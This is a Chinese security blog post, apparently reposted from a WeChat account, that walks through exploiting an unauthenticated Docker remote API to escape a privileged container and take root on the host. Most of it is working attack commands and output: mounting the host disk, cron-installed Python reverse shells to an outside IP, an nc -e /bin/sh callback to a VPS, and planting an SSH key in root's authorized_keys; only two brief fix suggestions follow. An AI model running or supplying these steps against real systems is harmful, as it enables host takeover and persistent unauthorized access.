2022年10月20日13:36:12评论78 views字数 5336阅读17分47秒阅读模式

0x00 漏洞简介

docker remote API未授权访问漏洞，此API主要目的是取代命令执行页面，开放2375监听容器时，会调用这个API，方便docker集群管理和扩展。

0x01 正文

验证漏洞存在

直接输入地址 http://your-ip:2375/version（端口会因为配置问题稍有出入）若能访问，证明存在未授权访问漏洞。

实战之 docker-unauthorized-rce 虚拟机逃逸漏洞

测试可达性

┌──(kali㉿kali)-[~/Desktop]└─$ ping 192.168.249.202 PING 192.168.249.202 (192.168.249.202) 56(84) bytes of data.64 bytes from 192.168.249.202: icmp_seq=1 ttl=128 time=1.97 ms64 bytes from 192.168.249.202: icmp_seq=2 ttl=128 time=2.26 ms^C--- 192.168.249.202 ping statistics ---2 packets transmitted, 2 received, 0% packet loss, time 1002msrtt min/avg/max/mdev = 1.971/2.116/2.261/0.145 ms                                                                                                       ┌──(kali㉿kali)-[~/Desktop]└─$ docker -H tcp://192.168.249.202:5555 psCONTAINER ID   IMAGE   COMMAND   CREATED   STATUS   PORTS   NAME

常见dockers管理命令docker -H tcp://192.168.249.202:5555 ps  #查看远程机器上docker运行情况docker -H tcp://192.168.249.202:5555 images  #查看远程机器上的正在运行的docker镜像

漏洞利用

┌──(root㉿kali)-[/home/kali/Desktop]└─# docker -H tcp://192.168.249.202:5555 pull alpine                       Using default tag: latestlatest: Pulling from library/alpineDigest: sha256:bc41182d7ef5ffc53a40b044e725193bc10142a1243f395ee852a8d9730fc2adStatus: Image is up to date for alpine:latestdocker.io/library/alpine:latest                                                                                                       ┌──(root㉿kali)-[/home/kali/Desktop]└─# docker -H tcp://192.168.249.202:5555 run -it --privileged alpine bin/sh    / # lsbin    etc    lib    mnt    proc   run    srv    tmp    vardev    home   media  opt    root   sbin   sys    usr/ # ifconfigeth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:02            inet addr:172.17.0.2  Bcast:172.17.255.255  Mask:255.255.0.0          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1          RX packets:8 errors:0 dropped:0 overruns:0 frame:0          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:0           RX bytes:656 (656.0 B)  TX bytes:0 (0.0 B)
lo        Link encap:Local Loopback            inet addr:127.0.0.1  Mask:255.0.0.0          UP LOOPBACK RUNNING  MTU:65536  Metric:1          RX packets:0 errors:0 dropped:0 overruns:0 frame:0          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:1000           RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

逃逸过程

挂载硬盘sda2

/ # fdisk -lDisk /dev/sda: 894 GB, 960197124096 bytes, 1875385008 sectors116737 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Device  Boot StartCHS    EndCHS        StartLBA     EndLBA    Sectors  Size Id Type/dev/sda1    0,32,33     522,75,1          2048    8390655    8388608 4096M 82 Linux swap/dev/sda2 *  522,75,2    1023,254,63    8390656 1875378175 1866987520  890G 83 LinuxDisk /dev/sdb: 894 GB, 960197124096 bytes, 1875385008 sectors116737 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Disk /dev/sdb doesn't contain a valid partition tableDisk /dev/sdf: 1863 GB, 2000398934016 bytes, 3907029168 sectors243201 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Disk /dev/sdf doesn't contain a valid partition tableDisk /dev/sdd: 1863 GB, 2000398934016 bytes, 3907029168 sectors243201 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Disk /dev/sdd doesn't contain a valid partition tableDisk /dev/sdc: 1863 GB, 2000398934016 bytes, 3907029168 sectors243201 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Disk /dev/sdc doesn't contain a valid partition tableDisk /dev/sde: 1863 GB, 2000398934016 bytes, 3907029168 sectors243201 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Disk /dev/sde doesn't contain a valid partition tableDisk /dev/dm-0: 1863 GB, 2000381018112 bytes, 3906994176 sectors243199 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Disk /dev/dm-0 doesn't contain a valid partition tableDisk /dev/dm-1: 1863 GB, 2000381018112 bytes, 3906994176 sectors243199 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Disk /dev/dm-1 doesn't contain a valid partition tableDisk /dev/dm-2: 1863 GB, 2000381018112 bytes, 3906994176 sectors243199 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Disk /dev/dm-2 doesn't contain a valid partition tableDisk /dev/dm-3: 894 GB, 960181043200 bytes, 1875353600 sectors116735 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Disk /dev/dm-3 doesn't contain a valid partition tableDisk /dev/dm-4: 1863 GB, 2000381018112 bytes, 3906994176 sectors243199 cylinders, 255 heads, 63 sectors/trackUnits: sectors of 1 * 512 = 512 bytes
Disk /dev/dm-4 doesn't contain a valid partition table/ # mkdir test/ # lsbin    etc    lib    mnt    proc   run    srv    test   usrdev    home   media  opt    root   sbin   sys    tmp    var/ # mount /dev/sda2 test/ # cd test/test # whoamiroot/test # touch just.txt/test # lsbin          home         lib64        log-2022-04  log-2022-08  proc         srv          varboot         iDiscovery   log-2021-09  log-2022-05  media        root         sysdev          just.txt     log-2021-11  log-2022-06  mnt          run          tmpetc          lib          log-2021-12  log-2022-07  opt          sbin         usr//至此sda2挂载到test下

尝试反弹shell

(crontab -l;printf " * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.159.130",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'n")|crontab -
echo "*/1 * * * * root python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.159.130",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'" >> /test/etc/crontab

经过以上尝试发现均反弹不会来，冥思苦想最后发现是被攻击机不出内网。。。。

更换vps进行尝试

//centos安装ncyum install -y nc//被攻击机 反弹shellnc IP 6666 -e /bin/sh//vps 接受shellnc -lvp 6666

实战之 docker-unauthorized-rce 虚拟机逃逸漏洞

vps攻击机视角

实战之 docker-unauthorized-rce 虚拟机逃逸漏洞

虚拟机被攻击机视角

获取到真实主机的root权限

实战之 docker-unauthorized-rce 虚拟机逃逸漏洞

真实主机的网卡信息

远程连接

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsYNh4bLNmhQ7Cu64zYsIrxYWyEGz2dbd2B4s+SeX0h7c2p1UboZ1IUB60D3R05pExRcIxbX+P7k3PSeCnHHJG6JSqiahPxR7+J+sCvVr4Ki6inP87P8kpIRmXR2iTnIm5+Q/1cuxGgdF9ut6mBfUA4G8HV0AGhdsyaO6HdeS5iVYyc3tNfKDaZPqXi0UA6RPXDfhO9AfxUYn+sbHkJqTP9sI/4yRr+lN9UquyCGc03my16wThgSUp5aXxJqkpOuzSjHxBcsHWKFB/FfQVIGqDJuqU01V13NuL23ag8aDL root@" > /root/.ssh/authorized_keysssh root@IP -i id_rsa

实战之 docker-unauthorized-rce 虚拟机逃逸漏洞

成功写入

0x02 修复建议

设置ACL，只允许信任的IP端口连接对应端口
开启TLS，使用生成的证书进行认证

- End -

原文始发于微信公众号（NS Demon团队）：实战之 docker-unauthorized-rce 虚拟机逃逸漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

实战之 docker-unauthorized-rce 虚拟机逃逸漏洞

0x00 漏洞简介

0x01 正文

验证漏洞存在

测试可达性

漏洞利用

逃逸过程

挂载硬盘sda2

尝试反弹shell

远程连接

0x02 修复建议

- End -

PostExpKit - 20240423更新

yzmcms-pay_callback-rce漏洞复现

owasp大模型应用威胁视图理解大模型应用目前所面临的主要安全威胁

新一代供应链安全攻击面

《生成式人工智能数据应用合规指南》正式发布，5月1日实施

漏洞挖掘 | 某米企业src未授权访问

初遇内嵌WebShell的pdf文件

Hackerone 附件功能存在IDOR越权漏洞15000$

从环境搭建到内网渗透靶机

漏洞挖掘之某厂商OAuth2.0认证缺陷

发表评论

在线咨询

微信